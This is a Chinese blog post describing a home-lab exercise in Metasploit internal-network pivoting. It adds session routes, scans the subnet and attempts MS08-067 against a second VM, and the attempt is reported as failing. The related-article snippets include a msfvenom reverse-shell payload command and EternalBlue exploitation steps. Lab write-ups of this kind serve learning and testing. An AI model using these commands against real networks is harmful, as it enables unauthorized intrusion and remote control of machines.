利用Metasploit Framework(msf)进行内网(域)渗透

最新推荐文章于 2024-05-19 12:00:00 发布
最新推荐文章于 2024-05-19 12:00:00 发布
阅读量5.1k 收藏 8
点赞数 3
分类专栏: 内网(域)渗透 文章标签: 安全 linux 其他
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42342141/article/details/107113750
版权

一、环境

攻击机:外网主机(搭载在阿里云服务器上的 msf)
受害机(靶机1):我的虚拟机 局域网 192.168.47.124
受害机(靶机2):我的虚拟机 局域网 192.168.47.122

1.2 环境描述:

1.2.1 内网(域)与外网环境描述

正常部署如下:
在这里插入图片描述
实验环境部署如下:
在这里插入图片描述

二、实验步骤

2.1 前提

假设已经获取了 靶机1 的权限

2.1.1 查看 IP 段

在这里插入图片描述

2.2添加一条基于 Session 的路由

添加路由:run autoroute -s 目标主机的IP段
查看路由:run autoroute -p

在这里插入图片描述
只要去往 192.168.47.0这个网段的数据都将通过 Session转发出去!!!

在这里插入图片描述

2.3 利用添加的路由进行内网主机和端口扫描

内网进行主机发现和端口扫描:use auxiliary/scanner/portscan/tcp

在这里插入图片描述发现内网还存在着另一台主机:192.169.47.122
在这里插入图片描述

2.4利用建立的路由,对另一台内网主机进行攻击

use exploit/windows/smb/ms08_067_netapi

注:此时我们可以将 LHOST 设为外网的攻击机(MSF IP),也可以设为已控靶机1的IP(192.168.47.124)

在这里插入图片描述
好吧问题来了!
1、将LHOST设为靶机1时,发现无法打开靶机1的端口!!!
2、将LHOST设为外网MSF时,利用 psexec尝试登入,发现登入失败!!!
但是利用本地kali虚拟机的模块却是正常的。。。

可能的原因:
1、可能环境比想象的更复杂!毕竟是云服务器!
2、由于是在linux上安装的MSF,我发现那个 windows/smb/psexec 与kali内的有些许差异。

在这里插入图片描述
声明:以上内容仅供参考学习,欢迎讨论!不可用于非法行为!

初学者L_言
关注
  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MSF渗透实战
hackzkaq的博客
05-17 3801
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全-小熊保安 本来还是想用cobalt strike,但是由于某些原因,暂时关闭了cobalt strike的服务器,正好用msf尝试做一次内渗透熟悉熟悉,注:最初用蚁剑看了一下,此次目标主机没开杀软,所以以下内容不涉及免杀. 一、MSF生成木马上线目标 1. 生成木马 使用命令: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XX LPORT=4444 -f ex
安全:Msfconsole攻击技术(成功拿下服务器最高权限.)
网络安全领域___专研者.
03-22 1万+
Msfconsole工具概括: Msfconsole简称(msf)是一款常用的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全测试人员的使用. (1)进行端口扫描. (2)进行服务的扫描.(3)扫描3306(Mysql)端口的弱口令.(4)在msf模块里也可以使用nmap进行扫描.(5)扫描了服务器是用Win XP,然后对服务器进行渗透测试.
【2024最新版】超详细Metasploit安装保姆级教程,Metasploit渗透测试使用,看完这一篇就够了_metasploit framework下载
最新发布
Karka_的博客
05-19 955
Metasploit是一个渗透测试框架,可以帮助您发现和利用漏洞。Metasploit还为您提供了一个开发平台,您可以编写自己的安全工具或利用代码。今天,我将指导您了解如何使用Metasploit的基础知识:如何安装Metasploit,使用框架以及利用漏洞。
利用路由器实现内穿透
一名大三才开始刷题的程序猿的刷题日记
05-22 7726
利用路由器实现内穿透问题背景设备以及环境过程1. 安装vmware虚拟机以及centos7.5 64位系统2. 更改络的连接方式3. 进入路由器后台管理页面,点击虚拟服务器应用进入4.效果如下 问题背景 没钱买服务器,但是还想把自己的站放到公上,让自己可以在公访问,方便自己的使用。 但是,利用花生壳实现内穿透限制太多太多,比如:只能进行两条映射,有带宽限制,想加载视频,想都别想······ 但是,迫于资本的无奈,还是选择了linux花生壳来实现内穿透,直到今天我家的路由器坏了,不得已换了这个已
渗透 MetasploitMSF)基础使用
Innocence_0的博客
03-09 829
msfvenom 是 msf 生成 payload 的一个工具这里要区分一下 EXP 与 Payload :EXP 是利用漏洞进行攻击动作,而 payload 是 EXP 执行成功后在目标内进行各种指令动作。除了可以将 payload 插入到 exp 里面,也可以作为独立模块进行生成,需要用这个工具生成一个落地化的,类似于会话,可移植性各种操作Armitage 就是一款使用 Java 为 Metasploit 编写的有图形化操作界面的软件,通过它可以轻松的使用 Metasploit 对目标进行攻击。
发现内存活主机的各种姿势
hackzkaq的博客
04-28 966
零基础学黑客,搜索公众号:白帽子左一 在渗透中,当我们拿下一台服务器作为跳板机进一步进行渗透时,往往需要通过主机存活探测和端口扫描来收集内资产。 本文主要是讲nmap的扫描和基于msf的扫描发现内存活主机,每一个点都尽量详细介绍。 1.基于UDP的扫描 UDP简介:UDP(User Datagram Protocol)是一种无连接的协议,在第四层-传输层,处于IP协议的 上一层。 UDP有不提供数据包分组、组装和不能对数据包进行排序的缺点,也就是说,当报 文发送之后,是无法得知其是否安全完整到达的
白帽黑客之Metasploit
10-25
本套教程,我们将为大家详细讲解Metasploit的使用方法。Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。 
关于Metasploit Framework渗透测试相关知识
12-28
在这个过程中,Metasploit Framework扮演着核心工具的角色,它为安全专家提供了大量的漏洞利用代码、扫描器、后渗透工具,以及一个强大的交互式环境,帮助测试者有效地执行测试任务。 **一、Metasploit Framework...
metasploit-framework-6.3.34.zip
09-17
Metasploit Framework,简称MSF,是一款开源的安全漏洞检测工具,主要用于安全研究人员进行渗透测试和漏洞验证。这个版本是6.3.34,代表着软件的最新迭代,通常会包含最新的功能、修复和性能改进。在络安全领,...
渗透Metasploit Framework基础知识
12-28
Metasploit Framework基础知识
毒蛇:metasploit-framework图形界面图形化内渗透工具
02-01
【毒蛇:Metasploit-Framework图形界面图形化内渗透工具】 毒蛇,全称为Viper,是一款基于Python开发的Metasploit-Framework的图形界面工具,它为红队和安全研究人员提供了一个友好的界面,用于管理和执行渗透...
metasploitframework-win-x64
10-05
Metasploit Framework 作为一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变得方便和简单。 使用...
【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)
热门推荐
Fighting_hawk的博客
03-27 2万+
1. 了解MSF框架的使用方法。 2. 了解永恒之蓝漏洞。
MSF渗透(案例)
3569
06-03 2万+
0x00 前言虽然渗透,但是不常使用msf进行渗透,这篇刚好的弥补了 win 和 linux shell 和 msf 的对接的流程。原文 : https://mp.weixin.qq.com/s/sKXWjgaViYsCjG33-5Ey8Q0x01 案例分析实验环境:目标环境:10.0.0.0/24, 10.0.1.0/24攻击主机:10.0.0.5 (Kali), 10.0.0.7 (Win...
metasploit(MSF)攻击ms17-010漏洞实验过程(内环境)
渗透、攻防、CTF、编程
10-12 3448
metasploit(MSF)攻击ms17-010漏洞实验过程(内环境) 0x01 知识点 MSF工具的利用,ms17-010漏洞实验 0x02 实验环境: 攻击机kaili linux 2020 (ip:192.168.233.129) 目标机:win7(ip:192.168.233.130) 0x03 实验准备 启动msf,输入msfconsole 检错漏洞库,输入search ms ,盐城msf库里存在ms17-010漏洞 3、nmap检测目标机开放端口 nmap –..
渗透之多种方式实现内穿透(详细)
qq_38348692的博客
09-03 1万+
靶机为win7 使用ms17_010_enternalbule获得meterpreter权限,在这里注意,设置payload是必须的,否则不能获得metepreter权限,直接弹到 创建跳板路由: run autoroute -s 192.168.10.0/24 创建路由 run autoroute -p 打印路由[在这里插入图片描述] 输入background退回metaploit可以看...
渗透 | 手把手教你如何进行渗透
songbai220
11-23 1万+
渗透 | 手把手教你如何进行渗透 目录 内渗透 | 手把手教你如何进行渗透 0x01 DMZ渗透 0x02 跳板及内探测 0x2.1 做跳板 0x2.2 内探测 0x03 第二层渗透 0x3.1 web渗透 or MS17_010 0x3.2 内探测+跳板代理链 0x4 第三层内渗透 0x5 总结 0x5.1 跳板总结 0x5.2 内探测 0x5.3 后话 0x01 DMZ渗透 首页 看到DMZ开启了web服务,是一个typec...
渗透
chenkaifang的博客
07-14 1797
参考链接:https://websec.readthedocs.io/zh/latest/basic/index.html 1、Windows信息搜集 基本命令 查询所有计算机名称dsquerycomputer 查看配置systeminfo 查看版本ver 进程信息tasklist/svc 查看所有环境变量set 查看计划任务schtasks/QUERY/fo...
1.路由器内穿透
元元的博客
01-08 1万+
开发中经常遇到调用第三方软件回调调试的情况,高手一般会通过打log来调试、排查问题,用内穿透是一种偷懒方式。下面看一下如何偷懒: 以TP-LINK路由器TL-WDR7400型号为例 http://service.tp-link.com.cn/detail_article_2636.html 1.登录路由器 2.找到路由器虚拟服务器,添加映射条目。 常用服务器选择HTTP,根据需要配置
利用Metasploit的永恒之蓝漏洞渗透win10
05-02
在使用Metasploit渗透测试工具之前,需要先了解一些基础知识。永恒之蓝漏洞是一个远程代码执行漏洞,它利用了Windows SMB v1协议中的一个缓冲区溢出漏洞。该漏洞可以使攻击者通过络获取Windows系统的控制权,而无需进行身份验证。 以下是使用Metasploit进行永恒之蓝漏洞渗透win10的步骤: 1. 首先,需要确定目标机器的IP地址和操作系统版本。可以使用nmap或其他扫描工具进行扫描。 2. 打开Kali Linux终端,输入msfconsole命令打开Metasploit控制台。 3. 在Metasploit控制台中输入search eternalblue,选择对应的exploit模块进行利用。 4. 设置目标机器的IP地址,以及目标机器的操作系统版本。 5. 输入run命令开始攻击,Metasploit会自动进行漏洞利用尝试。 6. 如果攻击成功,将会得到一个反向Shell,可以使用该Shell进行后续操作。 需要注意的是,永恒之蓝漏洞是一个非常危险的漏洞,使用Metasploit进行渗透测试时需要遵守相关法律法规,以及遵守渗透测试的道德规范。建议只在合法授权的情况下使用Metasploit进行渗透测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值